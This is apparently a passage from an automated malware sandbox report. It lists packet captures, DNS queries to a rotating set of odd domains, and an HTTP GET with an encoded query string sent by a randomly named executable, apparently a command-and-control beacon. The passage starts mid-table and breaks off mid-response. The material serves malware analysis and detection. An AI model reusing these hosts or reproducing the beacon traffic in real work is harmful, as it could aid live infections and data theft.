Aug 9, 2024 08:43:03.108628035 CEST	49749	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:03.113456011 CEST	80	49749	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:03.113528013 CEST	49749	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:03.115688086 CEST	49749	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:03.120696068 CEST	80	49749	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:03.838857889 CEST	80	49749	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:03.838890076 CEST	80	49749	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:03.838902950 CEST	80	49749	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:03.838917971 CEST	80	49749	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:03.839653969 CEST	49749	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:03.842473984 CEST	80	49749	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:03.844449997 CEST	80	49749	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:03.850267887 CEST	49749	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:04.630937099 CEST	49749	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:05.649142981 CEST	49750	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:05.654222012 CEST	80	49750	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:05.654324055 CEST	49750	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:05.655846119 CEST	49750	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:05.661005974 CEST	80	49750	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:06.369390011 CEST	80	49750	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:06.369410038 CEST	80	49750	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:06.369426966 CEST	80	49750	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:06.369452953 CEST	49750	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:06.374473095 CEST	80	49750	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:06.374520063 CEST	49750	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:06.375160933 CEST	80	49750	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:06.375205994 CEST	49750	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:07.170377970 CEST	49750	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:08.180319071 CEST	49751	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:08.185477018 CEST	80	49751	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:08.185600996 CEST	49751	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:08.187313080 CEST	49751	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:08.192583084 CEST	80	49751	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:08.193295002 CEST	80	49751	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:09.105014086 CEST	80	49751	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:09.105051994 CEST	80	49751	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:09.105062008 CEST	80	49751	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:09.105072021 CEST	80	49751	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:09.105079889 CEST	80	49751	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:09.105089903 CEST	80	49751	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:09.105098963 CEST	49751	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:09.105123997 CEST	49751	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:09.105142117 CEST	80	49751	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:09.105175972 CEST	49751	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:09.694334984 CEST	49751	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:10.712410927 CEST	49752	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:10.717480898 CEST	80	49752	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:10.717571974 CEST	49752	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:10.719718933 CEST	49752	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:10.724615097 CEST	80	49752	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:11.420634985 CEST	80	49752	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:11.420670033 CEST	80	49752	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:11.420681000 CEST	80	49752	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:11.420691013 CEST	80	49752	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:11.420810938 CEST	49752	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:11.420810938 CEST	49752	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:11.424026012 CEST	80	49752	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:11.424333096 CEST	80	49752	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:11.425280094 CEST	49752	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:11.427875042 CEST	49752	80	192.168.2.6	213.145.228.16
Aug 9, 2024 08:43:11.433010101 CEST	80	49752	213.145.228.16	192.168.2.6
Aug 9, 2024 08:43:16.472194910 CEST	49753	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:16.477452040 CEST	80	49753	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:16.477590084 CEST	49753	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:16.480118036 CEST	49753	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:16.485280037 CEST	80	49753	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:17.145499945 CEST	80	49753	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:17.146349907 CEST	80	49753	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:17.146519899 CEST	49753	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:17.991822004 CEST	49753	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:19.019417048 CEST	49754	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:19.024704933 CEST	80	49754	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:19.024878025 CEST	49754	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:19.027524948 CEST	49754	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:19.032778025 CEST	80	49754	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:19.691186905 CEST	80	49754	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:19.691646099 CEST	80	49754	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:19.691812038 CEST	49754	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:20.537060022 CEST	49754	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:21.558743954 CEST	49755	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:21.692564011 CEST	80	49755	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:21.698833942 CEST	49755	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:21.742141962 CEST	49755	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:21.747111082 CEST	80	49755	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:21.747195005 CEST	80	49755	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:22.350914001 CEST	80	49755	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:22.351166010 CEST	80	49755	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:22.352040052 CEST	49755	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:23.255776882 CEST	49755	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:24.292016983 CEST	49756	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:24.297131062 CEST	80	49756	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:24.298532963 CEST	49756	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:24.311909914 CEST	49756	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:24.317047119 CEST	80	49756	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:24.952893019 CEST	80	49756	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:24.952958107 CEST	80	49756	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:24.953012943 CEST	49756	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:24.955493927 CEST	49756	80	192.168.2.6	91.195.240.19
Aug 9, 2024 08:43:24.960707903 CEST	80	49756	91.195.240.19	192.168.2.6
Aug 9, 2024 08:43:30.103955030 CEST	49757	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:30.108952999 CEST	80	49757	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:30.111938953 CEST	49757	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:30.115289927 CEST	49757	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:30.120894909 CEST	80	49757	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:30.815277100 CEST	80	49757	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:30.815295935 CEST	80	49757	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:30.815316916 CEST	80	49757	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:30.815331936 CEST	80	49757	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:30.815346956 CEST	80	49757	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:30.815371037 CEST	49757	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:30.815371990 CEST	49757	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:30.815463066 CEST	49757	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:31.615784883 CEST	49757	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:32.634287119 CEST	49758	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:32.639796972 CEST	80	49758	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:32.639868021 CEST	49758	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:32.642030001 CEST	49758	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:32.647552967 CEST	80	49758	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:33.338969946 CEST	80	49758	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:33.339040041 CEST	80	49758	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:33.339078903 CEST	80	49758	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:33.339108944 CEST	49758	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:33.339160919 CEST	80	49758	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:33.339194059 CEST	80	49758	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:33.339304924 CEST	49758	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:33.339304924 CEST	49758	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:34.146545887 CEST	49758	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:35.165347099 CEST	49759	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:35.170450926 CEST	80	49759	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:35.170521021 CEST	49759	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:35.172642946 CEST	49759	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:35.180409908 CEST	80	49759	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:35.180424929 CEST	80	49759	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:35.884445906 CEST	80	49759	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:35.884470940 CEST	80	49759	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:35.884501934 CEST	80	49759	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:35.884516001 CEST	80	49759	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:35.884605885 CEST	49759	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:35.884607077 CEST	49759	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:35.884617090 CEST	80	49759	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:35.885535955 CEST	49759	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:36.677716970 CEST	49759	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:37.695844889 CEST	49760	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:37.700834036 CEST	80	49760	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:37.701538086 CEST	49760	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:37.703871965 CEST	49760	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:37.708848000 CEST	80	49760	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:38.454294920 CEST	80	49760	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:38.454405069 CEST	80	49760	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:38.454421043 CEST	80	49760	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:38.454436064 CEST	80	49760	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:38.454449892 CEST	80	49760	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:38.454467058 CEST	80	49760	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:38.454473972 CEST	49760	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:38.454546928 CEST	80	49760	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:38.454552889 CEST	49760	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:38.454552889 CEST	49760	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:38.454564095 CEST	80	49760	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:38.454581022 CEST	80	49760	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:38.454617023 CEST	49760	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:38.455012083 CEST	80	49760	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:38.455070019 CEST	49760	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:38.458311081 CEST	49760	80	192.168.2.6	194.58.112.174
Aug 9, 2024 08:43:38.463213921 CEST	80	49760	194.58.112.174	192.168.2.6
Aug 9, 2024 08:43:43.674043894 CEST	49762	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:43.678865910 CEST	80	49762	172.67.210.102	192.168.2.6
Aug 9, 2024 08:43:43.679928064 CEST	49762	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:43.683851957 CEST	49762	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:43.688710928 CEST	80	49762	172.67.210.102	192.168.2.6
Aug 9, 2024 08:43:45.193326950 CEST	49762	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:45.199009895 CEST	80	49762	172.67.210.102	192.168.2.6
Aug 9, 2024 08:43:45.199162960 CEST	49762	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:46.214405060 CEST	49763	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:46.219723940 CEST	80	49763	172.67.210.102	192.168.2.6
Aug 9, 2024 08:43:46.219813108 CEST	49763	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:46.221484900 CEST	49763	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:46.226608038 CEST	80	49763	172.67.210.102	192.168.2.6
Aug 9, 2024 08:43:47.726672888 CEST	49763	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:47.732312918 CEST	80	49763	172.67.210.102	192.168.2.6
Aug 9, 2024 08:43:47.738190889 CEST	49763	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:48.743624926 CEST	49764	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:48.748611927 CEST	80	49764	172.67.210.102	192.168.2.6
Aug 9, 2024 08:43:48.748682022 CEST	49764	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:48.750865936 CEST	49764	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:48.755723953 CEST	80	49764	172.67.210.102	192.168.2.6
Aug 9, 2024 08:43:48.756143093 CEST	80	49764	172.67.210.102	192.168.2.6
Aug 9, 2024 08:43:50.255850077 CEST	49764	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:50.261708975 CEST	80	49764	172.67.210.102	192.168.2.6
Aug 9, 2024 08:43:50.261847973 CEST	49764	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:51.274667978 CEST	49765	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:51.279829979 CEST	80	49765	172.67.210.102	192.168.2.6
Aug 9, 2024 08:43:51.279921055 CEST	49765	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:51.282494068 CEST	49765	80	192.168.2.6	172.67.210.102
Aug 9, 2024 08:43:51.287592888 CEST	80	49765	172.67.210.102	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 9, 2024 08:40:35.877289057 CEST	65280	53	192.168.2.6	1.1.1.1
Aug 9, 2024 08:40:36.084757090 CEST	53	65280	1.1.1.1	192.168.2.6
Aug 9, 2024 08:40:51.836477995 CEST	59389	53	192.168.2.6	1.1.1.1
Aug 9, 2024 08:40:52.007441044 CEST	53	59389	1.1.1.1	192.168.2.6
Aug 9, 2024 08:41:05.711608887 CEST	51451	53	192.168.2.6	1.1.1.1
Aug 9, 2024 08:41:05.903034925 CEST	53	51451	1.1.1.1	192.168.2.6
Aug 9, 2024 08:41:13.977207899 CEST	62102	53	192.168.2.6	1.1.1.1
Aug 9, 2024 08:41:13.997467041 CEST	53	62102	1.1.1.1	192.168.2.6
Aug 9, 2024 08:41:22.071312904 CEST	61053	53	192.168.2.6	1.1.1.1
Aug 9, 2024 08:41:22.441505909 CEST	53	61053	1.1.1.1	192.168.2.6
Aug 9, 2024 08:41:36.462232113 CEST	52977	53	192.168.2.6	1.1.1.1
Aug 9, 2024 08:41:36.703933001 CEST	53	52977	1.1.1.1	192.168.2.6
Aug 9, 2024 08:41:44.790054083 CEST	55566	53	192.168.2.6	1.1.1.1
Aug 9, 2024 08:41:45.787529945 CEST	55566	53	192.168.2.6	1.1.1.1
Aug 9, 2024 08:41:46.381428003 CEST	53	55566	1.1.1.1	192.168.2.6
Aug 9, 2024 08:41:46.381442070 CEST	53	55566	1.1.1.1	192.168.2.6
Aug 9, 2024 08:42:00.526504040 CEST	63318	53	192.168.2.6	1.1.1.1
Aug 9, 2024 08:42:00.629061937 CEST	53	63318	1.1.1.1	192.168.2.6
Aug 9, 2024 08:42:14.009001970 CEST	56297	53	192.168.2.6	1.1.1.1
Aug 9, 2024 08:42:14.840137959 CEST	53	56297	1.1.1.1	192.168.2.6
Aug 9, 2024 08:42:48.899584055 CEST	58894	53	192.168.2.6	1.1.1.1
Aug 9, 2024 08:42:49.022181988 CEST	53	58894	1.1.1.1	192.168.2.6
Aug 9, 2024 08:43:02.822072029 CEST	57023	53	192.168.2.6	1.1.1.1
Aug 9, 2024 08:43:03.105969906 CEST	53	57023	1.1.1.1	192.168.2.6
Aug 9, 2024 08:43:16.431845903 CEST	55591	53	192.168.2.6	1.1.1.1
Aug 9, 2024 08:43:16.469599009 CEST	53	55591	1.1.1.1	192.168.2.6
Aug 9, 2024 08:43:29.961807966 CEST	50688	53	192.168.2.6	1.1.1.1
Aug 9, 2024 08:43:30.053792953 CEST	53	50688	1.1.1.1	192.168.2.6
Aug 9, 2024 08:43:43.461709976 CEST	50464	53	192.168.2.6	1.1.1.1
Aug 9, 2024 08:43:43.670151949 CEST	53	50464	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 9, 2024 08:40:35.877289057 CEST	192.168.2.6	1.1.1.1	0x5670	Standard query (0)	www.hprlz.cz	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:40:51.836477995 CEST	192.168.2.6	1.1.1.1	0x2620	Standard query (0)	www.catherineviskadi.com	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:41:05.711608887 CEST	192.168.2.6	1.1.1.1	0x92ea	Standard query (0)	www.hatercoin.online	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:41:13.977207899 CEST	192.168.2.6	1.1.1.1	0x30ac	Standard query (0)	www.fourgrouw.cfd	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:41:22.071312904 CEST	192.168.2.6	1.1.1.1	0x6e5d	Standard query (0)	www.bfiworkerscomp.com	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:41:36.462232113 CEST	192.168.2.6	1.1.1.1	0x6be4	Standard query (0)	www.tinmapco.com	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:41:44.790054083 CEST	192.168.2.6	1.1.1.1	0x3eb8	Standard query (0)	www.xn--fhq1c541j0zr.com	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:41:45.787529945 CEST	192.168.2.6	1.1.1.1	0x3eb8	Standard query (0)	www.xn--fhq1c541j0zr.com	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:42:00.526504040 CEST	192.168.2.6	1.1.1.1	0xa472	Standard query (0)	www.xn--matfrmn-jxa4m.se	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:42:14.009001970 CEST	192.168.2.6	1.1.1.1	0xe84c	Standard query (0)	www.anuts.top	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:42:48.899584055 CEST	192.168.2.6	1.1.1.1	0x91f9	Standard query (0)	www.telwisey.info	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:43:02.822072029 CEST	192.168.2.6	1.1.1.1	0xac46	Standard query (0)	www.sandranoll.com	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:43:16.431845903 CEST	192.168.2.6	1.1.1.1	0x1502	Standard query (0)	www.gipsytroya.com	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:43:29.961807966 CEST	192.168.2.6	1.1.1.1	0x8e5c	Standard query (0)	www.helpers-lion.online	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:43:43.461709976 CEST	192.168.2.6	1.1.1.1	0x2ae1	Standard query (0)	www.dmtxwuatbz.cc	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 9, 2024 08:40:36.084757090 CEST	1.1.1.1	192.168.2.6	0x5670	No error (0)	www.hprlz.cz		5.44.111.162	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:40:52.007441044 CEST	1.1.1.1	192.168.2.6	0x2620	No error (0)	www.catherineviskadi.com		217.160.0.106	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:41:05.903034925 CEST	1.1.1.1	192.168.2.6	0x92ea	Name error (3)	www.hatercoin.online	none	none	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:41:13.997467041 CEST	1.1.1.1	192.168.2.6	0x30ac	Name error (3)	www.fourgrouw.cfd	none	none	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:41:22.441505909 CEST	1.1.1.1	192.168.2.6	0x6e5d	No error (0)	www.bfiworkerscomp.com		208.91.197.27	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:41:36.703933001 CEST	1.1.1.1	192.168.2.6	0x6be4	Name error (3)	www.tinmapco.com	none	none	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:41:46.381428003 CEST	1.1.1.1	192.168.2.6	0x3eb8	No error (0)	www.xn--fhq1c541j0zr.com		43.252.167.188	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:41:46.381442070 CEST	1.1.1.1	192.168.2.6	0x3eb8	No error (0)	www.xn--fhq1c541j0zr.com		43.252.167.188	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:42:00.629061937 CEST	1.1.1.1	192.168.2.6	0xa472	No error (0)	www.xn--matfrmn-jxa4m.se		194.9.94.85	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:42:00.629061937 CEST	1.1.1.1	192.168.2.6	0xa472	No error (0)	www.xn--matfrmn-jxa4m.se		194.9.94.86	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:42:14.840137959 CEST	1.1.1.1	192.168.2.6	0xe84c	No error (0)	www.anuts.top		23.251.54.212	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:42:49.022181988 CEST	1.1.1.1	192.168.2.6	0x91f9	No error (0)	www.telwisey.info		199.192.19.19	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:43:03.105969906 CEST	1.1.1.1	192.168.2.6	0xac46	No error (0)	www.sandranoll.com		213.145.228.16	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:43:16.469599009 CEST	1.1.1.1	192.168.2.6	0x1502	No error (0)	www.gipsytroya.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 9, 2024 08:43:16.469599009 CEST	1.1.1.1	192.168.2.6	0x1502	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:43:30.053792953 CEST	1.1.1.1	192.168.2.6	0x8e5c	No error (0)	www.helpers-lion.online		194.58.112.174	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:43:43.670151949 CEST	1.1.1.1	192.168.2.6	0x2ae1	No error (0)	www.dmtxwuatbz.cc		172.67.210.102	A (IP address)	IN (0x0001)	false
Aug 9, 2024 08:43:43.670151949 CEST	1.1.1.1	192.168.2.6	0x2ae1	No error (0)	www.dmtxwuatbz.cc		104.21.45.56	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.hprlz.cz

www.catherineviskadi.com

www.bfiworkerscomp.com

www.xn--fhq1c541j0zr.com

www.xn--matfrmn-jxa4m.se

www.anuts.top

www.telwisey.info

www.sandranoll.com

www.gipsytroya.com

www.helpers-lion.online

www.dmtxwuatbz.cc

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49718	5.44.111.162	80	5968	C:\Program Files (x86)\qZRPxyTsKtmRHhCpfjyjitIAiOHQwyvRnWyYmlTfINoYEmkCzLGZGSViOxTXPyWrnWj\WsLcnyccsDHmlxczMuydOvvxEH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 08:40:36.103529930 CEST	515	OUT	GET /w6qg/?f6Gp=VzB4OR5&_Z1XhZu=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazipzNNgDDIAUjfELp6jBD7CSuTSqHiapwIkFoNbxbnWBWfXwpxA= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.hprlz.cz Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 9, 2024 08:40:36.796612024 CEST	763	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Fri, 09 Aug 2024 06:40:36 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 396 Connection: close Location: https://www.hprlz.cz/w6qg/?f6Gp=VzB4OR5&_Z1XhZu=0lpTRQcDUH+iEsGzFrKDlEkxf0hSGbqe7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CazipzNNgDDIAUjfELp6jBD7CSuTSqHiapwIkFoNbxbnWBWfXwpxA= Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 70 72 6c 7a 2e 63 7a 2f 77 36 71 67 2f 3f 66 36 47 70 3d 56 7a 42 34 4f 52 35 26 61 6d 70 3b 5f 5a 31 58 68 5a 75 3d 30 6c 70 54 52 51 63 44 55 48 2b 69 45 73 47 7a 46 72 4b 44 6c 45 6b 78 66 30 68 53 47 62 71 65 37 5a 2f 78 75 4e 6d 54 67 64 6c 69 39 72 70 4f 55 47 79 58 69 7a 6a 35 63 51 39 58 78 43 34 73 6f 38 34 46 4e 70 46 52 39 74 78 58 78 6d 30 74 71 31 43 61 7a 69 70 7a 4e 4e 67 44 44 49 41 55 6a 66 45 4c 70 36 6a 42 44 37 43 53 75 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 